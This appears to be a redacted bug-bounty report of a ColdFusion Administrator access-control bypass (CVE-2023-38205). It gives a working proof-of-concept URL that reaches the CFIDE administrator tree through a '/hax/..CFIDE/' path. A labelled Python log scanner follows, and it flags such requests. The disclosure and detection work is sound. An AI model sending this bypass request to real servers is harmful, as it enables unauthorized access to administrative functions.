Hello Gents, I would like to report an issue where attackers are able to bypass the product feature that restricts external access to the ColdFusion Administrator. [CVE-2023-38205] at ██████
Steps to reproduce
- Please open the following link:
> https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
Proof of concept
Impact
Access Control Bypass.
Thanks and have a nice day!
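Added example, not part of the report above: a small log-scanning script a defender could run over web-server access logs to surface requests that reach the CFIDE administrator tree through a non-canonical path such as the `/hax/..CFIDE/` form shown in the proof-of-concept URL. The log lines are constructed samples in Apache combined format (the IPs are documentation addresses), the log regex and the `classify` heuristics are assumptions of this example, and nothing here depends on how ColdFusion itself evaluates the path.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache combined format); not taken from the report.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2023:10:00:01 +0000] "GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 512
203.0.113.5 - - [10/Jul/2023:10:00:02 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 403 0
198.51.100.7 - - [10/Jul/2023:10:00:03 +0000] "GET /index.cfm HTTP/1.1" 200 2048
203.0.113.5 - - [10/Jul/2023:10:00:04 +0000] "GET /a/%2e%2eCFIDE/administrator/index.cfm HTTP/1.1" 200 1024
"""

# Assumed combined-log layout: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def canonical_path(target: str) -> str:
    """Strip the query string and percent-decode the path (twice, to catch double encoding)."""
    path = urlsplit(target).path
    for _ in range(2):
        path = unquote(path)
    return path


def classify(path: str) -> list[str]:
    """Return the reasons a decoded request path looks like an admin-restriction bypass attempt."""
    reasons = []
    low = path.lower()
    # "cfide" appears somewhere in the path, but not as the expected leading /CFIDE/ prefix
    # that a prefix-based restriction would match.
    if "cfide" in low and not low.startswith("/cfide/"):
        reasons.append("CFIDE reached via non-canonical path")
    # A ".." fused directly to a segment name (e.g. "..CFIDE") is not a normal dot-segment.
    if re.search(r"\.\.(?=[^/])", low):
        reasons.append("dot-dot fused to a path segment")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse each log line and collect the requests that trip at least one heuristic."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-matching line; skip rather than fail the whole scan
        path = canonical_path(m.group("target"))
        reasons = classify(path)
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "path": path,
                "status": int(m.group("status")),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['path']}: {'; '.join(f['reasons'])}")
```

The direct `/CFIDE/administrator/index.cfm` request is left alone because the prefix check is expected to handle it (here it returned 403); the two variants that reach CFIDE through another leading segment are the ones worth reviewing, and a 200 on such a request is the signal that the restriction was not applied.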
System Host(s)
██████
Affected Product(s) and Version(s)
CVE Numbers
Suggested Mitigation/Remediation Actions